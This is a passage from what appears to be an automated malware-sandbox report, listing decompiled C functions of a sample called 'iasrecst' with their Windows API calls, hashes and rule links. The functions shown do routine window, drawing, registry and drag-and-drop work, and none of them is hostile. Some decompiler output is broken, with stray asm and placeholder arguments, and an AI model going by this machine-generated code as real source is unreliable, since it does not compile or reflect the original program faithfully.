						if(_t12 == 0) {
							goto L6;
						}
					} else {
						_t12 = E00414E0D(_t16, _a8, _a12);
						if(_t12 == 0) {
							goto L3;
						}
					}
				}
				L11:
				return _t12;
			}

APIs

GetDlgItem.USER32 ref: 00414E18
GetTopWindow.USER32(00000000), ref: 00414E2B
GetTopWindow.USER32(?), ref: 00414E5B
GetWindow.USER32(00000000,00000002), ref: 00414E76

Memory Dump Source

Source File: 00000001.00000002.493993336.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.493968359.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494135065.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494185133.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494209574.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494226463.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_iasrecst.jbxd

Similarity

API ID: Window$Item
String ID:
API String ID: 369458955-0
Opcode ID: 784f82e7734976b1dbf31960bbb8f16ae9e5790f6c6f8c00282bd4486821dd93
Instruction ID: 713c4843e211392e89bb80c14a0a22a2ce3b3a0133c9697a1d0cdd1df30717b3
Opcode Fuzzy Hash: 784f82e7734976b1dbf31960bbb8f16ae9e5790f6c6f8c00282bd4486821dd93
Instruction Fuzzy Hash: 3601DF3620031AA7CF222FA1DC04FDF3B19BF907A8B058022FD1095220D73AD99286ED

Uniqueness

Uniqueness Score: -1.00%

Function 00414E86, Relevance: 6.0, APIs: 4, Instructions: 49
windowCOMMON

Download Yara Rule

C-Code - Quality: 64%

			E00414E86(void* __edx, struct HWND__* _a4, int _a8, int _a12, long _a16, intOrPtr _a20, intOrPtr _a24) {
				void* __ebp;
				struct HWND__* _t16;
				void* _t20;
				void* _t22;
				struct HWND__* _t24;

				_t22 = __edx;
				_t16 = GetTopWindow(_a4);
				while(1) {
					_t24 = _t16;
					if(_t24 == 0) {
						break;
					}
					if(_a24 == 0) {
						SendMessageA(_t24, _a8, _a12, _a16);
					} else {
						_push(_t24);
						_t20 = E00413767();
						if(_t20 != 0) {
							_push(_a16);
							_push(_a12);
							_push(_a8);
							_push( *((intOrPtr*)(_t20 + 0x1c)));
							_push(_t20);
							E0041357F(_t22);
						}
					}
					if(_a20 != 0 && GetTopWindow(_t24) != 0) {
						E00414E86(_t22, _t24, _a8, _a12, _a16, _a20, _a24);
					}
					_t16 = GetWindow(_t24, 2);
				}
				return _t16;
			}

APIs

GetTopWindow.USER32(?), ref: 00414E94
SendMessageA.USER32 ref: 00414ECA
GetTopWindow.USER32(00000000), ref: 00414ED7
GetWindow.USER32(00000000,00000002), ref: 00414EF5

Memory Dump Source

Source File: 00000001.00000002.493993336.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.493968359.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494135065.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494185133.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494209574.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494226463.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_iasrecst.jbxd

Similarity

API ID: Window$MessageSend
String ID:
API String ID: 1496643700-0
Opcode ID: 964e5e527de8f2c614a29ec2c7bb328b2d9dd3a836f6323a01ca71765bcf14b3
Instruction ID: 3d1463f18b92dc59c4e8e68b3c1d5ad38cebe4dbe95d796ae8901b7c7719fd47
Opcode Fuzzy Hash: 964e5e527de8f2c614a29ec2c7bb328b2d9dd3a836f6323a01ca71765bcf14b3
Instruction Fuzzy Hash: 9901E93210021ABBCF226F959C04EDF3B2ABF85395F448016FA1055161C73AD9B2EFA9

Uniqueness

Uniqueness Score: -1.00%

Function 00412FC3, Relevance: 6.0, APIs: 4, Instructions: 48
windowCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E00412FC3(void* __ecx, void* __ebp, signed int _a4) {
				intOrPtr _t16;
				int _t17;
				void* _t20;
				struct HWND__* _t26;
				intOrPtr _t35;
				void* _t36;

				_t37 = __ebp;
				_t36 = __ecx;
				_t16 =  *((intOrPtr*)(__ecx + 0xc));
				if(_t16 == 0) {
					if(_a4 == 0) {
						_t35 =  *((intOrPtr*)(__ecx + 0x14));
						if(GetFocus() ==  *(_t35 + 0x1c)) {
							_t20 = E00413740(__ebp, GetParent( *(_t35 + 0x1c)));
							_t26 =  *(_t36 + 0x14);
							if(_t26 != 0) {
								_t26 =  *(_t26 + 0x1c);
							}
							E004166F5(E00413740(_t37, GetNextDlgTabItem( *(_t20 + 0x1c), _t26, 0)));
						}
					}
					_t17 = E004166CE( *(_t36 + 0x14), _a4);
					L9:
					 *((intOrPtr*)(_t36 + 0x18)) = 1;
					return _t17;
				}
				if( *((intOrPtr*)(__ecx + 0x10)) != 0) {
					return _t16;
				}
				asm("sbb ecx, ecx");
				_t17 = EnableMenuItem( *(_t16 + 4),  *(__ecx + 8), ( ~_a4 & 0xfffffffd) + 0x00000003 | 0x00000004);
				goto L9;
			}

APIs

EnableMenuItem.USER32 ref: 00412FEB
GetFocus.USER32 ref: 00412FFE
GetParent.USER32(?), ref: 0041300C
GetNextDlgTabItem.USER32 ref: 00413028

Memory Dump Source

Source File: 00000001.00000002.493993336.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.493968359.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494135065.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494185133.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494209574.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494226463.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_iasrecst.jbxd

Similarity

API ID: Item$EnableFocusMenuNextParent
String ID:
API String ID: 988757621-0
Opcode ID: bc0bc66af6aaaa198d2881ea29a35bfd1a92abf6c47daeb75bca8853a5adc8cd
Instruction ID: 99040edbaee9cc6ce9264ed7bff9ba50270304a60b21238e3b9e9fd35de4f38b
Opcode Fuzzy Hash: bc0bc66af6aaaa198d2881ea29a35bfd1a92abf6c47daeb75bca8853a5adc8cd
Instruction Fuzzy Hash: 30117071200600ABCB389F21D859B9BBBB5EF44715F104A2EF142861A1CB79F9C68B58

Uniqueness

Uniqueness Score: -1.00%

Function 00428D0F, Relevance: 6.0, APIs: 4, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E00428D0F(intOrPtr* __ecx, int _a4) {
				struct HDC__* _t8;
				int _t16;
				void* _t18;
				void* _t21;
				intOrPtr* _t22;

				_t16 = _a4;
				_t22 = __ecx;
				_t21 = GetStockObject(_t16);
				if(_t16 < 0xa || _t16 > 0xe && (_t16 <= 0xf || _t16 > 0x11)) {
					_t8 =  *(_t22 + 4);
					if(_t8 != 0) {
						SelectObject(_t8, _t21);
					}
					_push(SelectObject( *(_t22 + 8), _t21));
					return E0041A5FC();
				} else {
					_push(SelectObject( *(_t22 + 8), _t21));
					_t18 = E0041A5FC();
					if( *(_t22 + 0x2c) != _t21) {
						 *(_t22 + 0x2c) = _t21;
						E00428D7F(_t22);
					}
					return _t18;
				}
			}

APIs

GetStockObject.GDI32(?), ref: 00428D19
SelectObject.GDI32(?,00000000), ref: 00428D39
SelectObject.GDI32(?,00000000), ref: 00428D6B
SelectObject.GDI32(?,00000000), ref: 00428D71

Memory Dump Source

Source File: 00000001.00000002.493993336.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.493968359.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494135065.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494185133.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494209574.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494226463.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_iasrecst.jbxd

Similarity

API ID: Object$Select$Stock
String ID:
API String ID: 3337941649-0
Opcode ID: 14040c587b624426947bbf76c6a43b9f4206a3670462a83c466de879dd4b5385
Instruction ID: d553f3ff55a9007d7633e8bfee77d88ccc27de806737e89093267e5a4cde492b
Opcode Fuzzy Hash: 14040c587b624426947bbf76c6a43b9f4206a3670462a83c466de879dd4b5385
Instruction Fuzzy Hash: 5EF081717127206B9A305A66ECC9C2FB6BCDAA5384380482FF505C2261CE3CDC868A6D

Uniqueness

Uniqueness Score: -1.00%

Function 004253EE, Relevance: 6.0, APIs: 4, Instructions: 45
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004253EE(void* __ecx, signed short _a4, signed short _a8, signed short _a12, signed short _a16) {
				signed short _t21;
				void* _t37;

				_t37 = __ecx;
				if(IsWindow( *(__ecx + 0x1c)) == 0) {
					 *(_t37 + 0x90) = _a4;
					 *(_t37 + 0x94) = _a8;
					 *(_t37 + 0x88) = _a12;
					_t21 = _a16;
					 *(_t37 + 0x8c) = _t21;
					return _t21;
				}
				SendMessageA( *(_t37 + 0x1c), 0x420, 0, (_a16 & 0x0000ffff) << 0x00000010 | _a12 & 0x0000ffff);
				SendMessageA( *(_t37 + 0x1c), 0x41f, 0, (_a8 & 0x0000ffff) << 0x00000010 | _a4 & 0x0000ffff);
				return InvalidateRect( *(_t37 + 0x1c), 0, 1);
			}

0x004253f2
0x004253ff
0x0042544f
0x00425458
0x00425461
0x00425467
0x0042546a
0x00000000
0x0042546a
0x00425420
0x0042543a
0x00000000

APIs

IsWindow.USER32(0000E800), ref: 004253F7
SendMessageA.USER32 ref: 00425420
SendMessageA.USER32 ref: 0042543A
InvalidateRect.USER32(0000E800,00000000,00000001,?,004253A6,?,?,?,?,ToolbarWindow32,00000000,?,?,00000800,0000E800,00000000), ref: 00425443

Memory Dump Source

Source File: 00000001.00000002.493993336.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.493968359.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494135065.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494185133.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494209574.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494226463.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_iasrecst.jbxd

Similarity

API ID: MessageSend$InvalidateRectWindow
String ID:
API String ID: 3225880595-0
Opcode ID: f4d36221064b3d96524ce7ed6f56d09e9a1367ce0a48728fe94b366294ff310e
Instruction ID: f8499f2f8c5f873ffa7f07fa88986deb1236627fbfce6f7c18d287819d1ada54
Opcode Fuzzy Hash: f4d36221064b3d96524ce7ed6f56d09e9a1367ce0a48728fe94b366294ff310e
Instruction Fuzzy Hash: 00015270200714AFE7209F29DC01BAAB7F4FB04740F50842AF995D6291D7B0F851DB64

Uniqueness

Uniqueness Score: -1.00%

Function 0041E24C, Relevance: 6.0, APIs: 4, Instructions: 44
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041E24C(void* __ecx, CHAR* _a4, CHAR* _a8, char _a12) {
				char _v20;
				void* _t17;
				long _t19;
				void* _t27;
				void* _t28;

				_t27 = __ecx;
				if( *((intOrPtr*)(__ecx + 0x7c)) == 0) {
					wsprintfA( &_v20, "%d", _a12);
					return WritePrivateProfileStringA(_a4, _a8,  &_v20,  *(_t27 + 0x90));
				}
				_t17 = E00425E7D(__ecx, _a4);
				_t28 = _t17;
				if(_t28 != 0) {
					_t19 = RegSetValueExA(_t28, _a8, 0, 4,  &_a12, 4);
					RegCloseKey(_t28);
					return 0 | _t19 == 0x00000000;
				}
				return _t17;
			}

0x0041e253
0x0041e259
0x0041e29d
0x00000000
0x0041e2b6
0x0041e25e
0x0041e263
0x0041e267
0x0041e278
0x0041e281
0x00000000
0x0041e28e
0x0041e2be

APIs

RegSetValueExA.ADVAPI32(00000000,?,00000000,00000004,?,00000004,?,?), ref: 0041E278
RegCloseKey.ADVAPI32(00000000,?,?), ref: 0041E281
wsprintfA.USER32 ref: 0041E29D
WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 0041E2B6

Memory Dump Source

Source File: 00000001.00000002.493993336.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.493968359.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494135065.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494185133.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494209574.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494226463.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_iasrecst.jbxd

Similarity

API ID: ClosePrivateProfileStringValueWritewsprintf
String ID:
API String ID: 1902064621-0
Opcode ID: c64c2f92659329a41f607b98f266effe197065bf02326c4a916ab297078829d9
Instruction ID: 5e7b0193fad4bb3573ee89de37fde3184d05d4c4fb691ea0876ecaf7c45fa68e
Opcode Fuzzy Hash: c64c2f92659329a41f607b98f266effe197065bf02326c4a916ab297078829d9
Instruction Fuzzy Hash: 39018F32500629ABCB226F64DC09FEB3BACEF04714F44442AFE15A61A1E774D9118BD8

Uniqueness

Uniqueness Score: -1.00%

Function 00424F9B, Relevance: 6.0, APIs: 4, Instructions: 44
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00424F9B(intOrPtr* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				char _v16;
				int _t12;
				signed int _t16;
				int _t18;
				intOrPtr _t19;
				void* _t24;
				intOrPtr* _t27;

				_t19 = _a4;
				_t27 = __ecx;
				E0041F52D(__ecx, _t19, _a8);
				_t12 = E00416528(__ecx);
				if((_t12 & 0x00000001) != 0) {
					_t12 = IsZoomed(GetParent( *(__ecx + 0x1c)));
					if(_t12 == 0) {
						 *((intOrPtr*)( *_t27 + 0xa0))(0x407, 0,  &_v16, _t24);
						_t16 = GetSystemMetrics(5);
						_t18 = GetSystemMetrics(2);
						 *((intOrPtr*)(_t19 + 8)) =  *((intOrPtr*)(_t19 + 8)) - (_t16 << 1) - _v16 - _t18;
						return _t18;
					}
				}
				return _t12;
			}

0x00424fa2
0x00424fa6
0x00424fac
0x00424fb3
0x00424fbb
0x00424fc7
0x00424fcf
0x00424fe1
0x00424fef
0x00424ffd
0x00425002
0x00000000
0x00425002
0x00424fcf
0x00425008

APIs

Part of subcall function 00416528: GetWindowLongA.USER32 ref: 00416534

GetParent.USER32(0000E800), ref: 00424FC0
IsZoomed.USER32(00000000), ref: 00424FC7
GetSystemMetrics.USER32 ref: 00424FEF
GetSystemMetrics.USER32 ref: 00424FFD

Memory Dump Source

Source File: 00000001.00000002.493993336.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.493968359.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494135065.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494185133.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494209574.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494226463.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_iasrecst.jbxd

Similarity

API ID: MetricsSystem$LongParentWindowZoomed
String ID:
API String ID: 3909876373-0
Opcode ID: e1db2512c1cdb55af8a63a090f6a65cb5054dc0af1d91fee160cccb0b30ffb68
Instruction ID: 3022547c35077017ae25d59748aa6c1922cda0f4cb055a75ef651f6ebc74021f
Opcode Fuzzy Hash: e1db2512c1cdb55af8a63a090f6a65cb5054dc0af1d91fee160cccb0b30ffb68
Instruction Fuzzy Hash: 1E0167327006146BDB106FB4DC49B8EB768EF44744F414169FA01AB195D774AC45CBD4

Uniqueness

Uniqueness Score: -1.00%

Function 0040E3C9, Relevance: 6.0, APIs: 4, Instructions: 43
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 74%

			E0040E3C9(void* __ecx) {
				long _t1;
				long _t3;
				long _t8;
				void* _t9;

				_t1 =  *0x43a478; // 0x2
				_t9 = __ecx;
				_t8 = 2;
				if(_t1 != _t8) {
					__eflags = _t1;
					if(_t1 != 0) {
						while(1) {
							L7:
							__eflags =  *0x43a478 - 1;
							if( *0x43a478 != 1) {
								break;
							}
							Sleep(1);
						}
						__eflags =  *0x43a478 - _t8; // 0x2
						if(__eflags != 0) {
							L12:
							return _t9;
						}
						L10:
						_push(0x43a460);
						L11:
						EnterCriticalSection();
						goto L12;
					}
					_t3 = InterlockedExchange(0x43a478, 1);
					__eflags = _t3;
					if(__eflags != 0) {
						__eflags = _t3 - _t8;
						if(_t3 == _t8) {
							 *0x43a478 = _t8;
						}
						goto L7;
					}
					InitializeCriticalSection(0x43a460);
					E00405626(__eflags, E0040E447);
					 *0x43a478 = _t8;
					goto L10;
				}
				_push(0x43a460);
				goto L11;
			}

APIs

InterlockedExchange.KERNEL32(0043A478,00000001), ref: 0040E3F1
InitializeCriticalSection.KERNEL32(0043A460,?,00000000,?,0040C53D,?,?,?,?,0040101C,?,00401008), ref: 0040E3FC
EnterCriticalSection.KERNEL32(0043A460,?,00000000,?,0040C53D,?,?,?,?,0040101C,?,00401008), ref: 0040E43B

Memory Dump Source

Source File: 00000001.00000002.493993336.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.493968359.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494135065.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494185133.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494209574.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494226463.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_iasrecst.jbxd

Similarity

API ID: CriticalSection$EnterExchangeInitializeInterlocked
String ID:
API String ID: 3643093385-0
Opcode ID: 15d63c4fe175e07819c280863269abae371696f7f342b3235db02761f23b8789
Instruction ID: 459bb49f379d993a17294b602fe23a8fc8c079e5ea63f72b552277febdb2dab9
Opcode Fuzzy Hash: 15d63c4fe175e07819c280863269abae371696f7f342b3235db02761f23b8789
Instruction Fuzzy Hash: AAF0F4303C03509AEA204772AC8D6263754E7A4365F605837F6C1E22D0C7FA4CB2476E

Uniqueness

Uniqueness Score: -1.00%

Function 0042146D, Relevance: 6.0, APIs: 4, Instructions: 43
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0042146D(void* __ecx, void* _a4) {
				int _v8;
				char _v268;
				void* __ebp;
				void* _t15;
				int _t19;
				intOrPtr* _t23;
				void* _t25;

				E00413740(_t25, SetActiveWindow( *(__ecx + 0x1c)));
				_t19 = 0;
				_v8 = DragQueryFileA(_a4, 0xffffffff, 0, 0);
				_t15 = E00424BFB();
				_t23 =  *((intOrPtr*)(_t15 + 4));
				if(_v8 > 0) {
					do {
						DragQueryFileA(_a4, _t19,  &_v268, 0x104);
						_t15 =  *((intOrPtr*)( *_t23 + 0x7c))( &_v268);
						_t19 = _t19 + 1;
					} while (_t19 < _v8);
				}
				DragFinish(_a4);
				return _t15;
			}

0x00421483
0x0042148e
0x00421499
0x0042149c
0x004214a4
0x004214a7
0x004214a9
0x004214b9
0x004214c6
0x004214c9
0x004214ca
0x004214a9
0x004214d2
0x004214dc

APIs

SetActiveWindow.USER32(?), ref: 0042147C
DragQueryFileA.SHELL32(?,000000FF,00000000,00000000,00000000), ref: 00421497
DragQueryFileA.SHELL32(?,00000000,?,00000104), ref: 004214B9
DragFinish.SHELL32(?), ref: 004214D2

Memory Dump Source

Source File: 00000001.00000002.493993336.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.493968359.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494135065.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494185133.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494209574.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494226463.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_iasrecst.jbxd

Similarity

API ID: Drag$FileQuery$ActiveFinishWindow
String ID:
API String ID: 892977027-0
Opcode ID: 752db8e80aa1e4f32f20f1a7616dd3027f181ba7cb5e1fdd8a659f832917dc3b
Instruction ID: d3b2b95128177b05ecd3e0cb6b2ffa69d247fd4355a1387cba143c8becacc0b5
Opcode Fuzzy Hash: 752db8e80aa1e4f32f20f1a7616dd3027f181ba7cb5e1fdd8a659f832917dc3b
Instruction Fuzzy Hash: C001AD71A00118BFCB10AFA4EC84CDE7BBDEF04368B50416AB554960A0CB74AE828BA4

Uniqueness

Uniqueness Score: -1.00%

Function 004159DA, Relevance: 6.0, APIs: 4, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004159DA(struct HDC__* _a4, struct HWND__* _a8, intOrPtr _a12, void* _a16, long _a20) {
				long _v12;
				void _v16;
				intOrPtr _t12;
				long _t16;
				void* _t18;

				if(_a4 == 0 || _a16 == 0) {
					L10:
					return 0;
				} else {
					_t12 = _a12;
					if(_t12 == 1 || _t12 == 0 || _t12 == 5 || _t12 == 2 && E0041A759(_a8, _t12) == 0) {
						goto L10;
					} else {
						GetObjectA(_a16, 0xc,  &_v16);
						SetBkColor(_a4, _v12);
						_t16 = _a20;
						if(_t16 == 0xffffffff) {
							_t16 = GetSysColor(8);
						}
						SetTextColor(_a4, _t16);
						_t18 = 1;
						return _t18;
					}
				}
			}

APIs

GetObjectA.GDI32(00000000,0000000C,?), ref: 00415A18
SetBkColor.GDI32(00000000,00000000), ref: 00415A24
GetSysColor.USER32(00000008), ref: 00415A34
SetTextColor.GDI32(00000000,?), ref: 00415A3E

Part of subcall function 0041A759: GetWindowLongA.USER32 ref: 0041A76A

Memory Dump Source

Source File: 00000001.00000002.493993336.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.493968359.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494135065.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494185133.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494209574.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494226463.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_iasrecst.jbxd

Similarity

API ID: Color$LongObjectTextWindow
String ID:
API String ID: 2871169696-0
Opcode ID: 4ad30bffaeaffe627c47a10de67731051e8ff583e855d0137c1ba5dc160fcdf3
Instruction ID: 5794cb577ca1faeaf387d8a9650f772c60ab8f78b3a0630a70f1c9da6bb06112
Opcode Fuzzy Hash: 4ad30bffaeaffe627c47a10de67731051e8ff583e855d0137c1ba5dc160fcdf3
Instruction Fuzzy Hash: A1012830140609EFDF219FA4DD89BEB3B69EF80380F584622F912D41E0C774C9E5DA99

Uniqueness

Uniqueness Score: -1.00%

Function 00423A6F, Relevance: 6.0, APIs: 4, Instructions: 43
windowCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E00423A6F(void* __ecx) {
				void* __esi;
				void* _t16;
				void* _t28;
				void* _t30;
				intOrPtr _t32;
				intOrPtr _t34;

				E00406520(E0042A9EC, _t30);
				_push(__ecx);
				_push(__ecx);
				_t34 =  *0x439c44; // 0x1
				 *((intOrPtr*)(_t30 - 0x10)) = _t32;
				_t28 = __ecx;
				if(_t34 == 0) {
					 *((intOrPtr*)(_t30 - 4)) = 0;
					if( *(_t30 + 0xc) != 0) {
						lstrcpyA(E00416D38(_t28 + 0xc8, lstrlenA( *(_t30 + 0xc))),  *(_t30 + 0xc));
					} else {
						E00416A77(__ecx + 0xc8, __ecx);
					}
					SendMessageA( *(_t28 + 0x1c), 0x85, 0, 0);
					_t16 = 1;
				} else {
					_t16 = E004136A7(__ecx);
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t30 - 0xc));
				return _t16;
			}

APIs

__EH_prolog.LIBCMT ref: 00423A74
SendMessageA.USER32 ref: 00423AD2

Memory Dump Source

Source File: 00000001.00000002.493993336.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.493968359.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494135065.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494185133.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494209574.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494226463.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_iasrecst.jbxd

Similarity

API ID: H_prologMessageSend
String ID:
API String ID: 2337391251-0
Opcode ID: 4ca917c012f4fcbbd9e78dea033b59e07bb3dc9b9d14554c59375adacc446899
Instruction ID: 2aa457cf7095c193361f5c786731192497787529c17009fc52bec87f436ac3b9
Opcode Fuzzy Hash: 4ca917c012f4fcbbd9e78dea033b59e07bb3dc9b9d14554c59375adacc446899
Instruction Fuzzy Hash: 52018F72600210FECB219F52EC09AAF7B78FF94316F50853FF05655050CB795A42CB69

Uniqueness

Uniqueness Score: -1.00%

Function 004297EF, Relevance: 6.0, APIs: 4, Instructions: 39
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004297EF(void* __ecx) {
				struct tagPOINT _v12;
				struct tagPOINT _v20;
				struct HDC__* _t19;

				_t19 =  *(__ecx + 8);
				if(_t19 != 0 &&  *(__ecx + 4) != 0) {
					GetViewportOrgEx(_t19,  &_v12);
					E004298F1(__ecx,  &_v12);
					_v12.y = _v12.y +  *((intOrPtr*)(__ecx + 0x24));
					_v12.x = _v12.x +  *((intOrPtr*)(__ecx + 0x20));
					SetViewportOrgEx( *(__ecx + 4), _v12, _v12.y, 0);
					GetWindowOrgEx( *(__ecx + 8),  &_v20);
					return SetWindowOrgEx( *(__ecx + 4), _v20, _v20.y, 0);
				}
				return _t19;
			}

0x004297f8
0x004297fd
0x0042980a
0x00429816
0x00429821
0x00429824
0x00429832
0x0042983f
0x00000000
0x00429850
0x00429858

APIs

GetViewportOrgEx.GDI32(?,?), ref: 0042980A

Part of subcall function 004298F1: GetViewportExtEx.GDI32(?,?,?,?,?,0042981B,?), ref: 00429902
Part of subcall function 004298F1: GetWindowExtEx.GDI32(?,?,?,?,?,0042981B,?), ref: 0042990F

SetViewportOrgEx.GDI32(00000000,?,00000000,00000000), ref: 00429832
GetWindowOrgEx.GDI32(?,?), ref: 0042983F
SetWindowOrgEx.GDI32(00000000,?,?,00000000), ref: 00429850

Memory Dump Source

Source File: 00000001.00000002.493993336.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.493968359.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494135065.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494185133.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494209574.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494226463.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_iasrecst.jbxd

Similarity

API ID: ViewportWindow
String ID:
API String ID: 1589084482-0
Opcode ID: 9cb27b9576bff162c776de5092b62e69a93abe33db6f5d663133d7bfa2b1e625
Instruction ID: c39a85c19b382e653cd8ba5d99ea89e37b71820b7245054109fbca8261a50672
Opcode Fuzzy Hash: 9cb27b9576bff162c776de5092b62e69a93abe33db6f5d663133d7bfa2b1e625
Instruction Fuzzy Hash: CE018B31A00219EFDF21AB94DC09EAEBBB9FF08300F44446DF552A2160D730AA10DB48

Uniqueness

Uniqueness Score: -1.00%

Function 00423946, Relevance: 6.0, APIs: 4, Instructions: 38
COMMON

Download Yara Rule

C-Code - Quality: 38%

			E00423946(intOrPtr* __eax, void* __ebx, struct tagRECT* _a5, intOrPtr _a9) {
				int _t13;
				int _t14;
				void* _t18;
				signed int _t20;
				struct tagRECT* _t24;

				asm("pushfd");
				 *__eax =  *__eax + __eax;
				if( *__eax == 0) {
					_t20 = E00416528(_t18);
					if((_t20 & 0x00040600) == 0) {
						_push(GetSystemMetrics(6));
						_push(5);
					} else {
						_push(GetSystemMetrics(0x21));
						_push(0x20);
					}
					_t13 = GetSystemMetrics();
					_t24 = _a5;
					_t14 = InflateRect(_t24, _t13, ??);
					if((_t20 & 0x00c00000) != 0) {
						_t14 =  *0x439c9c; // 0x0
						_t24->top = _t24->top - _t14;
					}
				} else {
					_t14 = E00415361(_t18, _a5, _a9);
				}
				return _t14;
			}

APIs

GetSystemMetrics.USER32 ref: 00423975
GetSystemMetrics.USER32 ref: 00423989
InflateRect.USER32(?,00000000), ref: 00423991

Part of subcall function 00415361: AdjustWindowRectEx.USER32(?,00000000,00000000,00000000), ref: 00415382

Memory Dump Source

Source File: 00000001.00000002.493993336.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

